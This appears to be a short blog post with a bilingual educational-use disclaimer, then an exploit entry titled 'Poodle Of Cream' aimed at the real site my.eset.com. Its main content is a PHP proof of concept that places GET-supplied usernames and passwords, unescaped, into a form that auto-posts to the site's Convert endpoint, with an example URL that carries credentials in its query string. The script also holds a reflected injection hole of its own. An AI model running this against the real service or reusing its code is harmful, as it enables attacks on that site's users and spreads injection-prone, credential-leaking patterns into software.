Disclaimer
The information provided in this blog post is intended for educational and informational purposes only. It is not intended to encourage or promote any illegal or unethical activities, including hacking, cyberattacks, or any form of unauthorized access to computer systems, networks, or data.
Yasal Uyarı
Bu blog yazısında sağlanan bilgiler yalnızca eğitim ve bilgilendirme amaçlıdır. Bilgisayar korsanlığı, siber saldırılar veya bilgisayar sistemlerine, ağlara veya verilere herhangi bir şekilde yetkisiz erişim de dahil olmak üzere herhangi bir yasa dışı veya etik olmayan faaliyeti teşvik etme veya reklamlama amacı taşımaz.
Yasal bilgiler için
yasal sayfasını inceleyebilirsiniz .
Exploit Date : 19.10.2019
Exploit Author : Ali Can Gönüllü
Exploit Site : my.eset.com
Poodle Of Cream:
<?php
$user = $_GET["user"];
$pass = $_GET["pass"];
echo ' <form id="myForm" name="myForm" action="https://my.eset.com/Convert" method="post">
<input type="text" name="UserName" placeholder="UserName (EAV)" value="'.$user.'"><br>
<input type="password" name="Password" placeholder="Password" value="'.$pass.'"><br>
<input type="submit" value="Submit">
</form>';
?>
Ex. xxx.php?user=xxx@xxx.net&pass=xxx